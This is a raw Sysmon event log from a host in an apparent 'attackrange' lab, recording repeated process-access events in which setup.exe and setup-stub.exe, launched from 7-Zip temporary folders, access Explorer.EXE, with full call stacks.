13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
